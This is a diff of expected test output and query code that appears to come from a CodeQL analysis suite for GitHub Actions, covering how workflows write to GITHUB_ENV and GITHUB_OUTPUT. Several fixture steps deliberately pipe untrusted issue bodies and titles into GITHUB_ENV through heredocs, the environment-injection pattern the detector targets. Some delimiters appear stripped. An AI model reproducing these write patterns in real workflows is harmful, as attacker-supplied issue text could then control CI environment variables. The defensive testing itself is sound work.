}}\nEOF\n | .github/workflows/multiline.yml:30:9:34:6 | Run Step | | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:63:15:63:19 | line1 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:63:15:63:19 | line1 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:63:15:63:19 | line1 | .github/workflows/multiline.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | .github/workflows/multiline.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:66:15:66:24 | multiline1 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:66:15:66:24 | multiline1 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:66:15:66:24 | multiline1 | .github/workflows/multiline.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/multiline.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:71:15:71:21 | block11 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:71:15:71:21 | block11 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:71:15:71:21 | block11 | .github/workflows/multiline.yml:71:9:78:6 | Run Step | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:71:9:78:6 | Run Step | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:78:15:78:21 | block12 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:78:15:78:21 | block12 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:78:15:78:21 | block12 | .github/workflows/multiline.yml:78:9:85:6 | Run Step | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:78:9:85:6 | Run Step | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:85:15:85:21 | block13 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:85:15:85:21 | block13 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:85:15:85:21 | block13 | .github/workflows/multiline.yml:85:9:89:29 | Run Step | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:85:9:89:29 | Run Step | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | @@ -292,11 +402,11 @@ cfgNodes | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | -| .github/workflows/multiline.yml:1:1:33:14 | enter on: | -| .github/workflows/multiline.yml:1:1:33:14 | exit on: | -| .github/workflows/multiline.yml:1:1:33:14 | exit on: (normal) | -| .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:1:1:89:29 | enter on: | +| .github/workflows/multiline.yml:1:1:89:29 | exit on: | +| .github/workflows/multiline.yml:1:1:89:29 | exit on: (normal) | +| .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:9:5:89:29 | Job: Test | | .github/workflows/multiline.yml:11:9:15:6 | Run Step | | .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:15:9:20:6 | Run Step | @@ -305,9 +415,29 @@ cfgNodes | .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:24:9:30:6 | Run Step | | .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/test.yml:1:1:40:53 | enter on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | @@ -354,7 +484,7 @@ dfNodes | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | -| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:9:5:89:29 | Job: Test | | .github/workflows/multiline.yml:11:9:15:6 | Run Step | | .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:15:9:20:6 | Run Step | @@ -363,9 +493,29 @@ dfNodes | .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:24:9:30:6 | Run Step | | .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | | .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | @@ -413,7 +563,7 @@ nodeLocations | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | -| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | .github/workflows/multiline.yml:9:5:33:14 | .github/workflows/multiline.yml@9:5:33:14 | +| .github/workflows/multiline.yml:9:5:89:29 | Job: Test | .github/workflows/multiline.yml:9:5:89:29 | .github/workflows/multiline.yml@9:5:89:29 | | .github/workflows/multiline.yml:11:9:15:6 | Run Step | .github/workflows/multiline.yml:11:9:15:6 | .github/workflows/multiline.yml@11:9:15:6 | | .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:11:14:14:48 | .github/workflows/multiline.yml@11:14:14:48 | | .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:9:20:6 | .github/workflows/multiline.yml@15:9:20:6 | @@ -422,9 +572,29 @@ nodeLocations | .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:20:14:23:40 | .github/workflows/multiline.yml@20:14:23:40 | | .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:24:9:30:6 | .github/workflows/multiline.yml@24:9:30:6 | | .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:24:14:29:29 | .github/workflows/multiline.yml@24:14:29:29 | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:30:9:33:14 | .github/workflows/multiline.yml@30:9:33:14 | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:30:9:34:6 | .github/workflows/multiline.yml@30:9:34:6 | | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:30:14:33:14 | .github/workflows/multiline.yml@30:14:33:14 | | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline.yml:32:13:32:39 | .github/workflows/multiline.yml@32:13:32:39 | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | .github/workflows/multiline.yml:34:9:40:6 | .github/workflows/multiline.yml@34:9:40:6 | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:35:14:39:14 | .github/workflows/multiline.yml@35:14:39:14 | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | .github/workflows/multiline.yml:40:9:46:6 | .github/workflows/multiline.yml@40:9:46:6 | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:41:14:45:14 | .github/workflows/multiline.yml@41:14:45:14 | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | .github/workflows/multiline.yml:46:9:52:6 | .github/workflows/multiline.yml@46:9:52:6 | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:47:14:51:14 | .github/workflows/multiline.yml@47:14:51:14 | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | .github/workflows/multiline.yml:52:9:58:6 | .github/workflows/multiline.yml@52:9:58:6 | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline.yml:53:14:57:14 | .github/workflows/multiline.yml@53:14:57:14 | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | .github/workflows/multiline.yml:58:9:63:6 | .github/workflows/multiline.yml@58:9:63:6 | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline.yml:59:14:62:14 | .github/workflows/multiline.yml@59:14:62:14 | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | .github/workflows/multiline.yml:63:9:66:6 | .github/workflows/multiline.yml@63:9:66:6 | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | .github/workflows/multiline.yml:64:14:65:136 | .github/workflows/multiline.yml@64:14:65:136 | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | .github/workflows/multiline.yml:66:9:71:6 | .github/workflows/multiline.yml@66:9:71:6 | +| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/multiline.yml:67:14:70:36 | .github/workflows/multiline.yml@67:14:70:36 | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | .github/workflows/multiline.yml:71:9:78:6 | .github/workflows/multiline.yml@71:9:78:6 | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:72:14:77:29 | .github/workflows/multiline.yml@72:14:77:29 | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | .github/workflows/multiline.yml:78:9:85:6 | .github/workflows/multiline.yml@78:9:85:6 | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:79:14:84:29 | .github/workflows/multiline.yml@79:14:84:29 | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:9:89:29 | .github/workflows/multiline.yml@85:9:89:29 | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:86:14:89:29 | .github/workflows/multiline.yml@86:14:89:29 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | | .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:20:8:50 | .github/workflows/test.yml@8:20:8:50 | @@ -444,7 +614,7 @@ nodeLocations | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:20:40:53 | .github/workflows/test.yml@40:20:40:53 | scopes | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:1:1:89:29 | on: | | .github/workflows/test.yml:1:1:40:53 | on: push | sources | ahmadnassri/action-changed-files | * | output.files | filename | manual | @@ -575,20 +745,59 @@ testNormalizeExpr | github.event.pull_request.user["login"] | github.event.pull_request.user.login | | github.event.pull_request.user['login'] | github.event.pull_request.user.login | | github.event.pull_request['user']['login'] | github.event.pull_request.user.login | +writeToGitHubEnv1 +| JSON_RESPONSE<> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}) | PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV})\nEOF | +| VAR0 | $TITLE | VAR0<> $GITHUB_ENV) | VAR3<> $GITHUB_ENV)\nEOF | +| VAR4 | ${ISSUE_BODY1} | VAR4=${ISSUE_BODY1} | +| VAR5 | Hello\nWorld | VAR5<> $GITHUB_ENV", - "echo 'sha2=$(> $GITHUB_ENV", - "echo sha3=$(> $GITHUB_ENV", + "FOO\n{\n echo 'JSON_RESPONSE<> \"$GITHUB_ENV\"\nBAR" + //"FOO\n{\n echo 'JSON_RESPONSE<> \"$GITHUB_ENV\"\nBAR", + //"FOO\necho \"VAR3<> $GITHUB_ENV\necho \"$TITLE\" >> $GITHUB_ENV\necho \"EOF\" >> $GITHUB_ENV\nBAR", ] and - extractLineAssignment(t, "ENV", key, value) + //linesFileWrite(t, _, "$GITHUB_ENV", content, _) + blockFileWrite(t, _, "$GITHUB_ENV", content, _) + //extractFileWrite(t, "GITHUB_ENV", content) ) } -query predicate writeToGitHubOutput(string key, string value) { +query predicate writeToGitHubEnv(string key, string value, string content) { exists(string t | t = [ - "echo \"::set-output name=id1::$(> $GITHUB_OUTPUT", - "echo 'sha2=$(> $GITHUB_OUTPUT", - "echo sha3=$(> $GITHUB_OUTPUT", - "echo sha4=$(> \"$GITHUB_OUTPUT\"", - "echo sha5=$(> ${GITHUB_OUTPUT}", - "echo sha6=$(> \"${GITHUB_OUTPUT}\"", + // block + "{\n echo 'VAR0<> \"$GITHUB_ENV\"\n", + "{\necho 'VAR1<> \"$GITHUB_ENV\"", + "{\necho 'VAR2<> \"$GITHUB_ENV\"", + "FOO\n{\n echo 'VAR22<> \"$GITHUB_ENV\"\nBAR", + // multiline + "FOO\necho \"VAR3<> $GITHUB_ENV\necho \"$TITLE\" >> $GITHUB_ENV\necho \"EOF\" >> $GITHUB_ENV\nBAR", + "echo \"PACKAGES_FILE_LIST<> \"${GITHUB_ENV}\"\nls | grep -E \"*.(tar.gz|zip)$\" >> \"${GITHUB_ENV}\"\nls | grep -E \"*.(txt|md)$\" >> \"${GITHUB_ENV}\"\necho \"EOF\" >> \"${GITHUB_ENV}\"", + // heredoc 1 + "cat >> $GITHUB_ENV << EOL\nVAR4=${ISSUE_BODY1}\nEOL", + "cat > $GITHUB_ENV << EOL\nVAR5<> $GITHUB_ENV\nVAR6=${ISSUE_BODY3}\nEOL\n", + "cat < $GITHUB_ENV\nVAR7<> \"$GITHUB_ENV\"\nVAR8=$(echo \"FOO\")\nVAR9<> $GITHUB_ENV", + "echo 'VAR14=$(> 